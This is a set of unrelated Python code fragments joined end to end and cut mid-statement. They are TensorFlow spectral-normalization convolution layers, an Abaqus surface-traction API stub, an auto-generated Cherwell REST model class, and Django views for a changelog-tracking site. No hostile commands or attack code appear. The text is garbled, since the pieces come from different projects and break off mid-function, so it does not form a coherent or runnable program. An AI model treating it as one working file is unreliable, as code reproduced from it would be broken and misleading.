outputs = normalizer_fn(outputs, **normalizer_params)
if activation_fn is not None:
outputs = activation_fn(outputs)
return slim.utils.collect_named_outputs(outputs_collections, sc.name, outputs)
NO_OPS = 'NO_OPS'
def spectral_normed_weight(W, u=None, num_iters=1, update_collection=None, with_sigma=False):
# Usually num_iters = 1 will be enough
W_shape = W.shape.as_list()
W_reshaped = tf.reshape(W, [-1, W_shape[-1]])
if u is None:
u = tf.get_variable("u", [1, W_shape[-1]], initializer=tf.truncated_normal_initializer(), trainable=False)
def power_iteration(i, u_i, v_i):
v_ip1 = tf.nn.l2_normalize(tf.matmul(u_i, tf.transpose(W_reshaped)))
u_ip1 = tf.nn.l2_normalize(tf.matmul(v_ip1, W_reshaped))
return i + 1, u_ip1, v_ip1
_, u_final, v_final = tf.while_loop(
cond=lambda i, _1, _2: i < num_iters,
body=power_iteration,
loop_vars=(tf.constant(0, dtype=tf.int32),
u, tf.zeros(dtype=tf.float32, shape=[1, W_reshaped.shape.as_list()[0]]))
)
if update_collection is None:
# warnings.warn('Setting update_collection to None will make u being updated every W execution. This maybe undesirable'
# '. Please consider using a update collection instead.')
sigma = tf.matmul(tf.matmul(v_final, W_reshaped), tf.transpose(u_final))[0, 0]
# sigma = tf.reduce_sum(tf.matmul(u_final, tf.transpose(W_reshaped)) * v_final)
W_bar = W_reshaped / sigma
with tf.control_dependencies([u.assign(u_final)]):
W_bar = tf.reshape(W_bar, W_shape)
else:
sigma = tf.matmul(tf.matmul(v_final, W_reshaped), tf.transpose(u_final))[0, 0]
# sigma = tf.reduce_sum(tf.matmul(u_final, tf.transpose(W_reshaped)) * v_final)
W_bar = W_reshaped / sigma
W_bar = tf.reshape(W_bar, W_shape)
# Put NO_OPS to not update any collection. This is useful for the second call of discriminator if the update_op
# has already been collected on the first call.
if update_collection != NO_OPS:
tf.add_to_collection(update_collection, u.assign(u_final))
if with_sigma:
return W_bar, sigma
else:
return W_bar
class SpectralNormalizedConvolution2D(tf.layers.Conv2D):
def __init__(self, filters,
kernel_size,
spectral_normalization=False,
strides=(1, 1),
padding='valid',
data_format='channels_last',
dilation_rate=(1, 1),
activation=None,
use_bias=True,
kernel_initializer=None,
bias_initializer=tf.zeros_initializer(),
kernel_regularizer=None,
bias_regularizer=None,
activity_regularizer=None,
kernel_constraint=None,
bias_constraint=None,
trainable=True,
name=None,
**kwargs):
super(SpectralNormalizedConvolution2D, self).__init__(
filters=filters,
kernel_size=kernel_size,
strides=strides,
padding=padding,
data_format=data_format,
dilation_rate=dilation_rate,
activation=activation,
use_bias=use_bias,
kernel_initializer=kernel_initializer,
bias_initializer=bias_initializer,
kernel_regularizer=kernel_regularizer,
bias_regularizer=bias_regularizer,
activity_regularizer=activity_regularizer,
kernel_constraint=kernel_constraint,
bias_constraint=bias_constraint,
trainable=trainable,
name=name, **kwargs)
self.spectral_normalization = spectral_normalization
def build(self, input_shape):
input_shape = tf.TensorShape(input_shape)
if self.data_format == 'channels_first':
channel_axis = 1
else:
channel_axis = -1
if input_shape[channel_axis].value is None:
raise ValueError('The channel dimension of the inputs '
'should be defined. Found `None`.')
input_dim = input_shape[channel_axis].value
kernel_shape = self.kernel_size + (input_dim, self.filters)
self.kernel = self.add_variable(name='kernel',
shape=kernel_shape,
initializer=self.kernel_initializer,
regularizer=self.kernel_regularizer,
constraint=self.kernel_constraint,
trainable=True,
dtype=self.dtype)
if self.spectral_normalization:
# TODO pass update_collection?
vs = tf.get_variable_scope()
upd_coll = None if not vs.reuse else NO_OPS
# print("update collection = ", upd_coll)
self.kernel = spectral_normed_weight(self.kernel, update_collection=upd_coll)
if self.use_bias:
self.bias = self.add_variable(name='bias',
shape=(self.filters,),
initializer=self.bias_initializer,
regularizer=self.bias_regularizer,
constraint=self.bias_constraint,
trainable=True,
dtype=self.dtype)
else:
self.bias = None
self.input_spec = tf.layers.InputSpec(ndim=self.rank + 2,
axes={channel_axis: input_dim})
self._convolution_op = nn_ops.Convolution(
input_shape,
filter_shape=self.kernel.get_shape(),
dilation_rate=self.dilation_rate,
strides=self.strides,
padding=self.padding.upper(),
data_format=convert_data_format(self.data_format,
self.rank + 2))
self.built = True
class SpectralNormalizedConvolution2DTranspose(tf.layers.Conv2DTranspose):
def __init__(self, filters,
kernel_size,
spectral_normalization=False,
strides=(1, 1),
padding='valid',
data_format='channels_last',
dilation_rate=(1, 1),
activation=None,
use_bias=True,
kernel_initializer=None,
bias_initializer=tf.zeros_initializer(),
kernel_regularizer=None,
bias_regularizer=None,
activity_regularizer=None,
kernel_constraint=None,
bias_constraint=None,
trainable=True,
name=None,
**kwargs):
super(SpectralNormalizedConvolution2DTranspose, self).__init__(
filters=filters,
kernel_size=kernel_size,
strides=strides,
padding=padding,
data_format=data_format,
dilation_rate=dilation_rate,
activation=activation,
use_bias=use_bias,
kernel_initializer=kernel_initializer,
bias_initializer=bias_initializer,
kernel_regularizer=kernel_regularizer,
bias_regularizer=bias_regularizer,
activity_regularizer=activity_regularizer,
kernel_constraint=kernel_constraint,
bias_constraint=bias_constraint,
trainable=trainable,
name=name, **kwargs)
self.spectral_normalization = spectral_normalization
def build(self, input_shape):
if len(input_shape) != 4:
raise ValueError('Inputs should have rank 4. Received input shape: ' +
str(input_shape))
if self.data_format == 'channels_first':
channel_axis = 1
else:
channel_axis = -1
if input_shape[channel_axis] is None:
raise ValueError('The channel dimension of the inputs '
'should be defined. Found `None`.')
input_dim = input_shape[channel_axis]
self.input_spec = tf.layers.InputSpec(ndim=4, axes={channel_axis: input_dim})
kernel_shape = self.kernel_size + (self.filters, input_dim)
self.kernel = self.add_variable(name='kernel',
shape=kernel_shape,
initializer=self.kernel_initializer,
regularizer=self.kernel_regularizer,
constraint=self.kernel_constraint,
trainable=True,
dtype=self.dtype)
if self.spectral_normalization:
# TODO pass update_collection?
vs = tf.get_variable_scope()
upd_coll = None if not vs.reuse else NO_OPS
self.kernel = spectral_normed_weight(self.kernel, update_collection=upd_coll)
if self.use_bias:
self.bias = self.add_variable(name='bias',
shape=(self.filters,),
initializer=self.bias_initializer,
regularizer=self.bias_regularizer,
constraint=self.bias_constraint,
trainable=True,
dtype=self.dtype)
else:
self.bias = None
self.built = True
@add_arg_scope
def convolution2d_transpose(
inputs,
num_outputs,
kernel_size,
stride=1,
spectral_normalization=False,
padding='SAME',
data_format='NHWC',
activation_fn=tf.nn.relu,
normalizer_fn=None,
normalizer_params=None,
weights_initializer=tf.contrib.layers.xavier_initializer(),
weights_regularizer=None,
biases_initializer=tf.zeros_initializer(),
biases_regularizer=None,
reuse=None,
variables_collections=None,
outputs_collections=None,
trainable=True,
scope=None):
"""Adds a convolution2d_transpose with an optional batch normalization layer.
The function creates a variable called `weights`, representing the
kernel, that is convolved with the input. If `normalizer_fn` is `None`, a
second variable called 'biases' is added to the result of the operation.
Args:
inputs: A 4-D `Tensor` of type `float` and shape
`[batch, height, width, | |
import typing
from abaqusConstants import *
from .Load import Load
from ..Region.Region import Region
class SurfaceTraction(Load):
"""The SurfaceTraction object defines surface traction on a region.
The SurfaceTraction object is derived from the Load object.
Attributes
----------
name: str
A String specifying the load repository key.
angle: float
A Float specifying an additional rotation of **directionVector** about an axis. The
default value is 0.0.
axis: SymbolicConstant
A SymbolicConstant specifying the axis about which to apply an additional rotation of
**directionVector**. Possible values are AXIS_1, AXIS_2, and AXIS_3. The default value is
AXIS_1.
follower: Boolean
A Boolean specifying whether the direction of the force changes with rotation. The
default value is ON.This parameter may be modified only if **traction** is GENERAL. You
should provide the **follower** argument only if it is valid for the specified step.
resultant: Boolean
A Boolean specifying whether the to maintain a constant resultant force by defining
traction per unit undeformed area. If **resultant** is OFF, traction is defined per unit
deformed area. The default value is OFF.You should provide the **resultant** argument only
if it is valid for the specified step.
traction: SymbolicConstant
A SymbolicConstant specifying how to apply surface traction. Possible values are SHEAR
and GENERAL. The default value is SHEAR.
distributionType: SymbolicConstant
A SymbolicConstant specifying how the surface traction is distributed spatially.
Possible values are UNIFORM, USER_DEFINED, and FIELD. The default value is UNIFORM.
field: str
A String specifying the name of the :py:class:`~abaqus.Field.AnalyticalField.AnalyticalField` object associated with this load.
The **field** argument applies only when **distributionType=FIELD**. The default value is an
empty string.
userCsys: str
A String specifying a CSYS defined by a user-subroutine. If **userCsys=None**, the degrees
of freedom are defined in the global coordinate system or by the **localCsys** parameter
if defined. The default value is "None".
localCsys: int
None or a :py:class:`~abaqus.Datum.DatumCsys.DatumCsys` object specifying the local coordinate system of the load's degrees
of freedom. If **localCsys=None**, the degrees of freedom are defined in the global
coordinate system or by the **userCsys** parameter if defined. When this member is
queried, it returns an Int. The default value is None.
directionVector: tuple
A :py:class:`~abaqus.BasicGeometry.VertexArray.VertexArray` object of length 2 specifying the direction of the load. Instead of
through a ConstrainedSketchVertex, each point may be specified through a tuple of coordinates. If
**traction** is SHEAR, then **directionVector** will be projected onto the region surface.
This parameter is available only if **traction** is GENERAL or SHEAR.
region: Region
A :py:class:`~abaqus.Region.Region.Region` object specifying the region to which the load is applied.
Notes
-----
This object can be accessed by:
.. code-block:: python
import load
mdb.models[name].loads[name]
"""
# A String specifying the load repository key.
name: str = ''
# A Float specifying an additional rotation of *directionVector* about an axis. The
# default value is 0.0.
angle: float = 0
# A SymbolicConstant specifying the axis about which to apply an additional rotation of
# *directionVector*. Possible values are AXIS_1, AXIS_2, and AXIS_3. The default value is
# AXIS_1.
axis: SymbolicConstant = AXIS_1
# A Boolean specifying whether the direction of the force changes with rotation. The
# default value is ON.This parameter may be modified only if *traction* is GENERAL. You
# should provide the *follower* argument only if it is valid for the specified step.
follower: Boolean = ON
# A Boolean specifying whether the to maintain a constant resultant force by defining
# traction per unit undeformed area. If *resultant* is OFF, traction is defined per unit
# deformed area. The default value is OFF.You should provide the *resultant* argument only
# if it is valid for the specified step.
resultant: Boolean = OFF
# A SymbolicConstant specifying how to apply surface traction. Possible values are SHEAR
# and GENERAL. The default value is SHEAR.
traction: SymbolicConstant = SHEAR
# A SymbolicConstant specifying how the surface traction is distributed spatially.
# Possible values are UNIFORM, USER_DEFINED, and FIELD. The default value is UNIFORM.
distributionType: SymbolicConstant = UNIFORM
# A String specifying the name of the AnalyticalField object associated with this load.
# The *field* argument applies only when *distributionType*=FIELD. The default value is an
# empty string.
field: str = ''
# A String specifying a CSYS defined by a user-subroutine. If *userCsys*=None, the degrees
# of freedom are defined in the global coordinate system or by the *localCsys* parameter
# if defined. The default value is "None".
userCsys: str = ''
# None or a DatumCsys object specifying the local coordinate system of the load's degrees
# of freedom. If *localCsys*=None, the degrees of freedom are defined in the global
# coordinate system or by the *userCsys* parameter if defined. When this member is
# queried, it returns an Int. The default value is None.
localCsys: int = None
# A VertexArray object of length 2 specifying the direction of the load. Instead of
# through a ConstrainedSketchVertex, each point may be specified through a tuple of coordinates. If
# *traction* is SHEAR, then *directionVector* will be projected onto the region surface.
# This parameter is available only if *traction* is GENERAL or SHEAR.
directionVector: tuple = ()
# A Region object specifying the region to which the load is applied.
region: Region = Region()
def __init__(self, name: str, createStepName: str, region: Region, magnitude: float,
distributionType: SymbolicConstant = UNIFORM, field: str = '', amplitude: str = UNSET,
angle: float = 0, axis: SymbolicConstant = AXIS_1, localCsys: int = None,
userCsys: str = '', directionVector: tuple = (), follower: Boolean = ON,
resultant: Boolean = OFF, traction: SymbolicConstant = SHEAR):
"""This method creates a SurfaceTraction object.
Notes
-----
This function can be accessed by:
.. code-block:: python
mdb.models[name].SurfaceTraction
Parameters
----------
name
A String specifying the load repository key.
createStepName
A String specifying the name of the step in which the load is created.
region
A Region object specifying the region to which the load is applied.
magnitude
A Float or Complex specifying the load magnitude. *magnitude* is optional if
*distributionType*=USER_DEFINED.
distributionType
A SymbolicConstant specifying how the surface traction is distributed spatially.
Possible values are UNIFORM, USER_DEFINED, and FIELD. The default value is UNIFORM.
field
A String specifying the name of the AnalyticalField object associated with this load.
The *field* argument applies only when *distributionType*=FIELD. The default value is an
empty string.
amplitude
A String or the SymbolicConstant UNSET specifying the name of the amplitude reference.
UNSET should be used if the load has no amplitude reference. The default value is UNSET.
You should provide the *amplitude* argument only if it is valid for the specified step.
angle
A Float specifying an additional rotation of *directionVector* about an axis. The
default value is 0.0.
axis
A SymbolicConstant specifying the axis about which to apply an additional rotation of
*directionVector*. Possible values are AXIS_1, AXIS_2, and AXIS_3. The default value is
AXIS_1.
localCsys
None or a DatumCsys object specifying the local coordinate system of the load's degrees
of freedom. If *localCsys*=None, the degrees of freedom are defined in the global
coordinate system or by the *userCsys* parameter if defined. When this member is
queried, it returns an Int. The default value is None.
userCsys
A String specifying a CSYS defined by a user-subroutine. If *userCsys*=None, the degrees
of freedom are defined in the global coordinate system or by the *localCsys* parameter
if defined. The default value is "None".
directionVector
A VertexArray object of length 2 specifying the direction of the load. Instead of | |
<reponame>greenpau/pycherwell
# coding: utf-8
"""
Cherwell REST API
Unofficial Python Cherwell REST API library. # noqa: E501
The version of the OpenAPI document: 9.3.2
Contact: See AUTHORS.
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from pycherwell.configuration import Configuration
class Action(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'action_command': 'str',
'action_type': 'str',
'always_text_and_image': 'bool',
'begin_group': 'bool',
'child_actions': 'list[Action]',
'dependencies': 'list[str]',
'display_text': 'str',
'enabled': 'bool',
'gallery_image': 'str',
'help_text': 'str',
'login_enabled_mode': 'str',
'login_visibility_mode': 'str',
'name': 'str',
'parameters': 'list[KeyValuePairStringString]',
'visible': 'bool'
}
attribute_map = {
'action_command': 'actionCommand',
'action_type': 'actionType',
'always_text_and_image': 'alwaysTextAndImage',
'begin_group': 'beginGroup',
'child_actions': 'childActions',
'dependencies': 'dependencies',
'display_text': 'displayText',
'enabled': 'enabled',
'gallery_image': 'galleryImage',
'help_text': 'helpText',
'login_enabled_mode': 'loginEnabledMode',
'login_visibility_mode': 'loginVisibilityMode',
'name': 'name',
'parameters': 'parameters',
'visible': 'visible'
}
def __init__(self, action_command=None, action_type=None, always_text_and_image=None, begin_group=None, child_actions=None, dependencies=None, display_text=None, enabled=None, gallery_image=None, help_text=None, login_enabled_mode=None, login_visibility_mode=None, name=None, parameters=None, visible=None, local_vars_configuration=None): # noqa: E501
"""Action - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._action_command = None
self._action_type = None
self._always_text_and_image = None
self._begin_group = None
self._child_actions = None
self._dependencies = None
self._display_text = None
self._enabled = None
self._gallery_image = None
self._help_text = None
self._login_enabled_mode = None
self._login_visibility_mode = None
self._name = None
self._parameters = None
self._visible = None
self.discriminator = None
if action_command is not None:
self.action_command = action_command
if action_type is not None:
self.action_type = action_type
if always_text_and_image is not None:
self.always_text_and_image = always_text_and_image
if begin_group is not None:
self.begin_group = begin_group
if child_actions is not None:
self.child_actions = child_actions
if dependencies is not None:
self.dependencies = dependencies
if display_text is not None:
self.display_text = display_text
if enabled is not None:
self.enabled = enabled
if gallery_image is not None:
self.gallery_image = gallery_image
if help_text is not None:
self.help_text = help_text
if login_enabled_mode is not None:
self.login_enabled_mode = login_enabled_mode
if login_visibility_mode is not None:
self.login_visibility_mode = login_visibility_mode
if name is not None:
self.name = name
if parameters is not None:
self.parameters = parameters
if visible is not None:
self.visible = visible
@property
def action_command(self):
"""Gets the action_command of this Action. # noqa: E501
:return: The action_command of this Action. # noqa: E501
:rtype: str
"""
return self._action_command
@action_command.setter
def action_command(self, action_command):
"""Sets the action_command of this Action.
:param action_command: The action_command of this Action. # noqa: E501
:type: str
"""
self._action_command = action_command
@property
def action_type(self):
"""Gets the action_type of this Action. # noqa: E501
:return: The action_type of this Action. # noqa: E501
:rtype: str
"""
return self._action_type
@action_type.setter
def action_type(self, action_type):
"""Sets the action_type of this Action.
:param action_type: The action_type of this Action. # noqa: E501
:type: str
"""
allowed_values = ["None", "OneStep", "Command", "BuiltIn", "Category", "SearchGrp", "Report", "Dashboard", "Calendar", "Visualization", "Group", "Page", "DocRepository", "PortalCommand", "ActionCatalog", "OneStepForRecord"] # noqa: E501
if self.local_vars_configuration.client_side_validation and action_type not in allowed_values: # noqa: E501
raise ValueError(
"Invalid value for `action_type` ({0}), must be one of {1}" # noqa: E501
.format(action_type, allowed_values)
)
self._action_type = action_type
@property
def always_text_and_image(self):
"""Gets the always_text_and_image of this Action. # noqa: E501
:return: The always_text_and_image of this Action. # noqa: E501
:rtype: bool
"""
return self._always_text_and_image
@always_text_and_image.setter
def always_text_and_image(self, always_text_and_image):
"""Sets the always_text_and_image of this Action.
:param always_text_and_image: The always_text_and_image of this Action. # noqa: E501
:type: bool
"""
self._always_text_and_image = always_text_and_image
@property
def begin_group(self):
"""Gets the begin_group of this Action. # noqa: E501
:return: The begin_group of this Action. # noqa: E501
:rtype: bool
"""
return self._begin_group
@begin_group.setter
def begin_group(self, begin_group):
"""Sets the begin_group of this Action.
:param begin_group: The begin_group of this Action. # noqa: E501
:type: bool
"""
self._begin_group = begin_group
@property
def child_actions(self):
"""Gets the child_actions of this Action. # noqa: E501
:return: The child_actions of this Action. # noqa: E501
:rtype: list[Action]
"""
return self._child_actions
@child_actions.setter
def child_actions(self, child_actions):
"""Sets the child_actions of this Action.
:param child_actions: The child_actions of this Action. # noqa: E501
:type: list[Action]
"""
self._child_actions = child_actions
@property
def dependencies(self):
"""Gets the dependencies of this Action. # noqa: E501
:return: The dependencies of this Action. # noqa: E501
:rtype: list[str]
"""
return self._dependencies
@dependencies.setter
def dependencies(self, dependencies):
"""Sets the dependencies of this Action.
:param dependencies: The dependencies of this Action. # noqa: E501
:type: list[str]
"""
self._dependencies = dependencies
@property
def display_text(self):
"""Gets the display_text of this Action. # noqa: E501
:return: The display_text of this Action. # noqa: E501
:rtype: str
"""
return self._display_text
@display_text.setter
def display_text(self, display_text):
"""Sets the display_text of this Action.
:param display_text: The display_text of this Action. # noqa: E501
:type: str
"""
self._display_text = display_text
@property
def enabled(self):
"""Gets the enabled of this Action. # noqa: E501
:return: The enabled of this Action. # noqa: E501
:rtype: bool
"""
return self._enabled
@enabled.setter
def enabled(self, enabled):
"""Sets the enabled of this Action.
:param enabled: The enabled of this Action. # noqa: E501
:type: bool
"""
self._enabled = enabled
@property
def gallery_image(self):
"""Gets the gallery_image of this Action. # noqa: E501
:return: The gallery_image of this Action. # noqa: E501
:rtype: str
"""
return self._gallery_image
@gallery_image.setter
def gallery_image(self, gallery_image):
"""Sets the gallery_image of this Action.
:param gallery_image: The gallery_image of this Action. # noqa: E501
:type: str
"""
self._gallery_image = gallery_image
@property
def help_text(self):
"""Gets the help_text of this Action. # noqa: E501
:return: The help_text of this Action. # noqa: E501
:rtype: str
"""
return self._help_text
@help_text.setter
def help_text(self, help_text):
"""Sets the help_text of this Action.
:param help_text: The help_text of this Action. # noqa: E501
:type: str
"""
self._help_text = help_text
@property
def login_enabled_mode(self):
"""Gets the login_enabled_mode of this Action. # noqa: E501
:return: The login_enabled_mode of this Action. # noqa: E501
:rtype: str
"""
return self._login_enabled_mode
@login_enabled_mode.setter
def login_enabled_mode(self, login_enabled_mode):
"""Sets the login_enabled_mode of this Action.
:param login_enabled_mode: The login_enabled_mode of this Action. # noqa: E501
:type: str
"""
allowed_values = ["Anonymous", "LoggedIn", "Both"] # noqa: E501
if self.local_vars_configuration.client_side_validation and login_enabled_mode not in allowed_values: # noqa: E501
raise ValueError(
"Invalid value for `login_enabled_mode` ({0}), must be one of {1}" # noqa: E501
.format(login_enabled_mode, allowed_values)
)
self._login_enabled_mode = login_enabled_mode
@property
def login_visibility_mode(self):
"""Gets the login_visibility_mode of this Action. # noqa: E501
:return: The login_visibility_mode of this Action. # noqa: E501
:rtype: str
"""
return self._login_visibility_mode
@login_visibility_mode.setter
def login_visibility_mode(self, login_visibility_mode):
"""Sets the login_visibility_mode of this Action.
:param login_visibility_mode: The login_visibility_mode of this Action. # noqa: E501
:type: str
"""
allowed_values = ["Anonymous", "LoggedIn", "Both"] # noqa: E501
if self.local_vars_configuration.client_side_validation and login_visibility_mode not in allowed_values: # noqa: E501
raise ValueError(
"Invalid value for `login_visibility_mode` ({0}), must be one of {1}" # noqa: E501
.format(login_visibility_mode, allowed_values)
)
self._login_visibility_mode = login_visibility_mode
@property
def name(self):
"""Gets the name of this Action. # noqa: E501
:return: The name of this Action. # noqa: E501
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this Action.
:param name: The name of this Action. # noqa: E501
:type: str
"""
self._name = name
@property
def parameters(self):
"""Gets the parameters of this Action. # noqa: E501
:return: The parameters of this Action. # noqa: E501
:rtype: list[KeyValuePairStringString]
"""
return self._parameters
@parameters.setter
def parameters(self, parameters):
"""Sets the parameters of this Action.
:param parameters: The parameters of this Action. # noqa: E501
:type: list[KeyValuePairStringString]
"""
self._parameters = parameters
@property
def visible(self):
"""Gets the visible of this Action. # noqa: E501
:return: The visible of this Action. # noqa: E501
:rtype: bool
"""
return self._visible
@visible.setter
def visible(self, visible):
"""Sets the visible of this Action.
:param visible: The visible of this Action. # noqa: E501
:type: bool
"""
self._visible = visible
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ | |
result['activity_heat_map'] = grouped
def process_description(text):
return re.sub(ur'changelog:(?P<pk>\d+)',
transform_changelog_mention,
text)
return result
class ImmediateResponse(BaseException):
def __init__(self, response):
self.response = response
class ImmediateMixin(object):
def dispatch(self, *args, **kwargs):
try:
return super(ImmediateMixin, self).dispatch(*args, **kwargs)
except ImmediateResponse as e:
return e.response
class SearchView(ImmediateMixin, CommonContextMixin, TemplateView):
template_name = 'allmychanges/search.html'
def get_context_data(self, **kwargs):
context = super(SearchView, self).get_context_data(**kwargs)
q = self.request.GET.get('q').strip()
# first, try to find q among source urls
if '://' in q:
# then might be it is a URL?
normalized_url, _, _ = normalize_url(q, for_checkout=False)
try:
changelog = Changelog.objects.get(source=normalized_url)
if changelog.name is not None:
raise ImmediateResponse(
HttpResponseRedirect(reverse('project',
name=changelog.name,
namespace=changelog.namespace)))
except Changelog.DoesNotExist:
pass
# next, try to find q among synonyms
synonyms = SourceSynonym.objects.all().values_list('changelog_id', 'source')
for changelog_id, pattern in synonyms:
if re.match(pattern, q) is not None:
changelog = Changelog.objects.get(pk=changelog_id)
raise ImmediateResponse(
HttpResponseRedirect(reverse('project',
name=changelog.name,
namespace=changelog.namespace)))
# if q is looks like an URL and we come to this point,
# then user entered an unknown url and we need to redirect
# him to a page where he could tune parser and add a new project
if '://' in q:
raise ImmediateResponse(
HttpResponseRedirect(reverse('add-new') \
+ '?' \
+ urllib.urlencode({'url': normalized_url})))
# finally, try to find exact match by namespace and name
if '/' in q:
namespace, name = q.split('/', 1)
elif ' ' in q:
namespace, name = q.split(' ', 1)
else:
namespace = None
name = q
params = dict(name=name.strip())
if namespace:
params['namespace'] = namespace.strip()
changelogs = Changelog.objects.filter(**params)
if changelogs.count() == 1:
changelog = changelogs[0]
raise ImmediateResponse(
HttpResponseRedirect(reverse('project',
name=changelog.name,
namespace=changelog.namespace)))
context.update(params)
context['changelogs'] = changelogs
context['q'] = q
return context
class AddNewView(ImmediateMixin, CommonContextMixin, TemplateView):
template_name = 'allmychanges/tune-project.html'
def get_context_data(self, **kwargs):
context = super(AddNewView, self).get_context_data(**kwargs)
context['menu_add_new'] = True
user = self.request.user if self.request.user.is_authenticated() else None
url = self.request.GET.get('url')
if url is None:
if 'step3' in self.request.GET:
context['title'] = 'Step 3 of 3'
context['step3'] = True
else:
normalized_url, _, _ = normalize_url(url, for_checkout=False)
# first, we'll get params from query, if they were given
params = dict(name=self.request.GET.get('name'),
namespace=self.request.GET.get('namespace'),
description=self.request.GET.get('description', ''),
icon=self.request.GET.get('icon', ''))
# and finally, we'll try to guess downloader
# if not params.get('downloader'):
# downloaders = guess_downloaders(normalized_url)
# params['downloader'] = ','.join(
# d['name'] for d in downloaders)
# else:
downloaders = []
# TODO: replace with code inside of downloaders
# if name was not given, then we'll try to guess it
# if not params['name']:
# guesser = get_namespace_guesser(params['downloader'])
# guessed = guesser(normalized_url)
# guessed['name'] = Changelog.create_uniq_name(guessed['namespace'],
# guessed['name'])
# for key, value in guessed.items():
# if value:
# params[key] = value
# icon don't saved into the preview yet
icon = params.pop('icon')
try:
changelog = Changelog.objects.get(source=normalized_url)
if changelog.name is not None:
raise ImmediateResponse(
HttpResponseRedirect(reverse('project',
name=changelog.name,
namespace=changelog.namespace)))
UserHistoryLog.write(self.request.user,
self.request.light_user,
'package-create',
u'User created changelog:{0}'.format(changelog.pk))
except Changelog.DoesNotExist:
changelog = Changelog.objects.create(
source=normalized_url,
icon=icon)
if user:
chat.send('Wow, user {user} added project with url: <{url}>'.format(
user=user_slack_name(user),
url=normalized_url))
else:
chat.send('Wow, light user {0} added project with url: <{1}>'.format(
self.request.light_user, normalized_url))
UserHistoryLog.write(self.request.user,
self.request.light_user,
'package-create',
u'User created changelog:{0}'.format(changelog.pk))
changelog.problem = None
changelog.save()
preview = changelog.create_preview(
user=user,
light_user=self.request.light_user,
**params)
preview.schedule_update()
context['changelog'] = changelog
context['preview'] = preview
context['can_edit'] = True
context['downloaders'] = downloaders
if self.request.user.is_authenticated() and self.request.user.username in settings.ADVANCED_EDITORS:
context['can_edit_xslt'] = True
context['mode'] = 'add-new'
return context
class EditProjectView(ImmediateMixin, CommonContextMixin, TemplateView):
template_name = 'allmychanges/tune-project.html'
def get_context_data(self, **kwargs):
context = super(EditProjectView, self).get_context_data(**kwargs)
params = get_keys(kwargs, 'namespace', 'name', 'pk')
changelog = Changelog.objects.get(**params)
preview = changelog.create_preview(
user=self.request.user if self.request.user.is_authenticated() else None,
light_user=self.request.light_user)
if changelog.versions.count() == 0:
preview.schedule_update()
namespace = changelog.namespace
name = changelog.name
context['changelog'] = changelog
context['title'] = '{0}/{1}'.format(
namespace or 'unknown',
name or 'unknown')
if not changelog.source:
context['guessed_sources'] = guess_source(namespace, name)
else:
context['guessed_sources'] = []
context['preview'] = preview
context['mode'] = 'edit'
context['can_edit'] = changelog.editable_by(self.request.user,
self.request.light_user)
if self.request.user.is_authenticated() and self.request.user.username in settings.ADVANCED_EDITORS:
context['can_edit_xslt'] = True
return context
class DeleteProjectView(ImmediateMixin, CommonContextMixin, View):
def post(self, request, **kwargs):
params = get_keys(kwargs, 'namespace', 'name', 'pk')
changelog = get_object_or_404(Changelog, **params)
# only superusers and moderator can delete changelog
if not changelog.editable_by(self.request.user,
self.request.light_user):
raise ImmediateResponse(
HttpResponse('Access denied', status=403))
Changelog.objects.filter(pk=changelog.pk).delete()
return HttpResponseRedirect(reverse('track-list') + '#projects-to-tune')
class MergeProjectView(SuperuserRequiredMixin,
CommonContextMixin,
TemplateView):
template_name = 'allmychanges/admin/merge-package.html'
def get_context_data(self, **kwargs):
context = super(MergeProjectView, self).get_context_data(**kwargs)
to_changelog = Changelog.objects.get(**kwargs)
context['to_changelog'] = to_changelog
return context
def post(self, request, **kwargs):
context = self.get_context_data(**kwargs)
from_changelog = request.POST.get('from_changelog')
to_changelog = context['to_changelog']
context['from_changelog_str'] = from_changelog
agreed = request.POST.get('agreed')
if from_changelog.count('/') != 1:
context['error'] = 'Please, use format "namespace/name".'
try:
namespace, name = from_changelog.split('/', 1)
from_changelog = Changelog.objects.get(
namespace=namespace,
name=name)
except Changelog.DoesNotExist:
context['error'] = 'Changelog not found.'
else:
context['from_changelog'] = from_changelog
if 'error' not in context:
if to_changelog.pk == from_changelog.pk:
context['error'] = 'This is the same project, choose another.'
if 'error' not in context:
if agreed is None:
context['show_agreed'] = True
else:
with log.name_and_fields('changelog-merge',
from_changelog=from_changelog.pk,
to_changelog=to_changelog.pk):
log.info('Merging changelogs')
from_changelog.merge_into(to_changelog)
project_url = reverse('project', **kwargs)
return HttpResponseRedirect(project_url)
return self.render_to_response(context)
class SynonymsView(ImmediateMixin, CommonContextMixin, TemplateView):
template_name = 'allmychanges/synonyms.html'
def _get_changelog_and_check_rights(self, **kwargs):
changelog = Changelog.objects.get(namespace=kwargs['namespace'],
name=kwargs['name'])
if not changelog.editable_by(self.request.user,
self.request.light_user):
raise ImmediateResponse(
HttpResponse('Access denied', status=403))
return changelog
def get_context_data(self, **kwargs):
context = super(SynonymsView, self).get_context_data(**kwargs)
context['changelog'] = self._get_changelog_and_check_rights(**kwargs)
return context
def post(self, request, **kwargs):
changelog = self._get_changelog_and_check_rights(**kwargs)
synonym = request.POST.get('synonym')
with log.fields(synonym=synonym):
log.debug('Adding synonym')
changelog.add_synonym(synonym)
return HttpResponseRedirect(reverse('synonyms', **kwargs))
class PreviewView(CachedMixin, CommonContextMixin, TemplateView):
"""This view is used to preview how changelog will look like
at "Add New" page.
It returns an html fragment to be inserted into the "Add new" page.
"""
template_name = 'allmychanges/changelog-preview.html'
def get_cache_params(self, *args, **kwargs):
preview_id = kwargs['pk']
self.preview = Preview.objects.get(pk=preview_id)
cache_key = 'changelog-preview-{0}:{1}'.format(
self.preview.id,
int(time.mktime(self.preview.updated_at.timetuple()))
if self.preview.updated_at is not None
else 'missing')
# print 'Cache key:', cache_key
return cache_key, 4 * HOUR
def get_context_data(self, **kwargs):
result = super(PreviewView, self).get_context_data(**kwargs)
# initially there is no versions in the preview
# and we'll show versions from changelog if any exist
preview = self.preview
changelog = preview.changelog
if preview.status == 'created':
obj = changelog
else:
obj = preview
filter_args = {}
if self.preview.updated_at is not None:
filter_args['preview'] = self.preview
else:
filter_args['preview'] = None
